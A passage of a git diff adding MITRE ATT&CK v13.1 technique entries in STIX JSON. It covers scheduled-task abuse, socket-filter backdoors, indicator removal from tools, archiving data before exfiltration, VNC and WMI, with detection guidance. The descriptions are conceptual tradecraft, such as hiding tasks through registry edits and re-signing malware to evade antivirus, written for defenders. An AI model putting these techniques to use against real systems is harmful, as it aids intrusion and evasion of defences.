Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9.json new file mode 100644 index 0000000000000000000000000000000000000000..67d97e000d81be619d6ecd9ca6d3da731841667d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9.json @@ -0,0 +1,116 @@ +{ + "type": "bundle", + "id": "bundle--30d122bc-61e5-4d6d-870b-5246320f82e3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-07T17:11:17.807Z", + "name": "Scheduled Task", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_contributors": [ + "Andrew Northern, @ex_raritas", + "Bryan Campbell, @bry_campbell", + "Zachary Abzug, @ZackDoesML", + "Selena Larson, @selenalarson", + "Sittikorn Sangrattanapitak" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "File: File Modification", + "Scheduled Job: Scheduled Job Creation", + "Windows Registry: Windows Registry Key Creation", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "id": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "created": "2019-11-27T14:58:00.429Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/005", + "external_id": "T1053.005" + }, + { + "source_name": "SigmaHQ", + "description": "BlackB0lt. (2022, April 15). https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml. Retrieved June 1, 2022.", + "url": "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" + }, + { + "source_name": "ProofPoint Serpent", + "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain" + }, + { + "source_name": "Defending Against Scheduled Task Attacks in Windows Environments", + "description": "Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.", + "url": "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments" + }, + { + "source_name": "Twitter Leoloobeek Scheduled Task", + "description": "Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.", + "url": "https://twitter.com/leoloobeek/status/939248813465853953" + }, + { + "source_name": "Tarrask scheduled task", + "description": "Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/" + }, + { + "source_name": "Microsoft Scheduled Task Events Win10", + "description": "Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events" + }, + { + "source_name": "TechNet Scheduled Task Events", + "description": "Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.", + "url": "https://technet.microsoft.com/library/dd315590.aspx" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "TechNet Forum Scheduled Task Operational Setting", + "description": "Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.", + "url": "https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520.json new file mode 100644 index 0000000000000000000000000000000000000000..3929ba5c96ede86155df1f6245a5df271d456d85 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520.json @@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--155f36ca-dd8b-48ff-be96-579affabf812", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T19:56:18.579Z", + "name": "Socket Filters", + "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Tim (Wadhwa-)Brown", + "CrowdStrike" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Connection Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "created": "2022-09-30T21:18:41.930Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1205/002", + "external_id": "T1205.002" + }, + { + "source_name": "exatrack bpf filters passive backdoors", + "description": "ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.", + "url": "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" + }, + { + "source_name": "crowdstrike bpf socket filters", + "description": "Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.", + "url": "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/" + }, + { + "source_name": "Leonardo Turla Penquin May 2020", + "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA \u201cPenquin_x64\u201d. Retrieved March 11, 2021.", + "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf" + }, + { + "source_name": "haking9 libpcap network sniffing", + "description": "Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.", + "url": "http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6.json new file mode 100644 index 0000000000000000000000000000000000000000..84ee9a94e428e52f89ec15fb53b5e507d475ebae --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--f278a551-bff2-46b3-864c-8017fd9154dc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6", + "type": "attack-pattern", + "created": "2017-05-31T21:30:54.176Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1066", + "external_id": "T1066" + } + ], + "modified": "2020-03-20T15:22:53.835Z", + "name": "Indicator Removal from Tools", + "description": "If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "Log analysis", + "Host intrusion prevention systems", + "Anti-virus" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662.json new file mode 100644 index 0000000000000000000000000000000000000000..7aa869fd8f5d6b2df32bbff1de9ebc361bdda702 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662.json @@ -0,0 +1,81 @@ +{ + "type": "bundle", + "id": "bundle--ffe10296-7286-435d-baea-d8e0cb7a1325", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T19:28:21.394Z", + "name": "Archive via Utility", + "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. \n\nOn Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_contributors": [ + "Mayan Arora aka Mayan Mohan", + "Mark Wee" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "File: File Creation", + "Process: Process Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "created": "2020-02-20T21:01:25.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1560/001", + "external_id": "T1560.001" + }, + { + "source_name": "WinRAR Homepage", + "description": "A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.", + "url": "https://www.rarlab.com/" + }, + { + "source_name": "WinZip Homepage", + "description": "Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.", + "url": "https://www.winzip.com/win/en/" + }, + { + "source_name": "7zip Homepage", + "description": "I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.", + "url": "https://www.7-zip.org/" + }, + { + "source_name": "diantz.exe_lolbas", + "description": "Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Diantz/" + }, + { + "source_name": "Wikipedia File Header Signatures", + "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", + "url": "https://en.wikipedia.org/wiki/List_of_file_signatures" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b.json new file mode 100644 index 0000000000000000000000000000000000000000..4cd7a7e05ad2a4ee85f89211408f107a1945710d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b.json @@ -0,0 +1,113 @@ +{ + "type": "bundle", + "id": "bundle--e3722e26-5e9b-4903-b1c1-92ee0063b4e8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:46.879Z", + "name": "VNC", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (\u201cremote framebuffer\u201d) protocol to enable users to remotely control another computer\u2019s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_detection": "Use of VNC may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\n\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Network Traffic: Network Connection Creation", + "Process: Process Creation" + ], + "x_mitre_system_requirements": [ + "VNC server installed and listening for connections." + ], + "type": "attack-pattern", + "id": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "created": "2020-02-11T18:28:44.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/005", + "external_id": "T1021.005" + }, + { + "source_name": "The Remote Framebuffer Protocol", + "description": "T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.", + "url": "https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2" + }, + { + "source_name": "MacOS VNC software for Remote Desktop", + "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", + "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac" + }, + { + "source_name": "VNC Authentication", + "description": "Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.", + "url": "https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication" + }, + { + "source_name": "Hijacking VNC", + "description": "Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.", + "url": "https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc" + }, + { + "source_name": "macOS root VNC login without authentication", + "description": "Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.", + "url": "https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication" + }, + { + "source_name": "VNC Vulnerabilities", + "description": "Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/" + }, + { + "source_name": "Offensive Security VNC Authentication Check", + "description": "Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.", + "url": "https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/" + }, + { + "source_name": "Attacking VNC Servers PentestLab", + "description": "Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.", + "url": "https://pentestlab.blog/2012/10/30/attacking-vnc-servers/" + }, + { + "source_name": "Havana authentication bug", + "description": "Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.", + "url": "http://lists.openstack.org/pipermail/openstack/2013-December/004138.html" + }, + { + "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", + "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.", + "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins" + }, + { + "source_name": "Gnome Remote Desktop grd-settings", + "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", + "url": "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207" + }, + { + "source_name": "Gnome Remote Desktop gschema", + "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", + "url": "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055.json new file mode 100644 index 0000000000000000000000000000000000000000..f0a3459eb014606424641f6c7e492195e5c7cadc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--1323325f-9452-40ef-91e2-35d3a688ac41", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-07T17:10:13.696Z", + "name": "Windows Management Instrumentation", + "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_contributors": [ + "@ionstorm" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "created": "2017-05-31T21:30:44.329Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1047", + "external_id": "T1047" + }, + { + "source_name": "FireEye WMI 2015", + "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" + }, + { + "source_name": "FireEye WMI SANS 2015", + "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf" + }, + { + "source_name": "MSDN WMI", + "description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/aa394582.aspx" 